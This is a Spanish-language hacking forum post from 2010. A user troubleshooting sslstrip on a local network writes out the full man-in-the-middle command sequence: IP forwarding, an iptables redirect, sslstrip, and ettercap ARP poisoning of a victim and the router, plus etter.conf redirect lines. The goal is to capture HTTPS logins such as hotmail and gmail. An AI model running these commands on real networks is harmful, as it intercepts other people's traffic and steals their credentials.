elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Problemas con sslstrip [SOLUCIONADO] en: 12 Mayo 2010, 06:40 am
Tengo el siguiente problema, veran he estado probando en mi red local sslstrip y no consigo capturar trafico de los sitios https.
veran lo que hago es lo siguiente
como root
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -k -p -l 10000
sudo ettercap -Tq -M arp:remote -i eth1 // //
o si solo una victima
sudo ettercap -Tq -M arp:remote -i eth1 ipvictima iprouter
He probado con sitios que no son https y si funciona por lo que el mitm no es el problema, ahora cuando configuro el navegador a travez de proxy 127.0.0.1 10000, inicio sesion en hotmail o gmail en algunas de las maquinas victimas con o sin tener activado ettercap y   y ahi si captura :(

me imagino que el problema radica en la redireccion del trafico en iptables pero no estoy seguro. tengo el archivo /etc/etter.conf editado de la siguiente manera

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
bueno es la parte que interesa de archivo... si alguien le ha sucedido o tiene idea... tengo instalado apache y el puerto que usa es el 80, he parado apache y aun asi no funciona :(
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines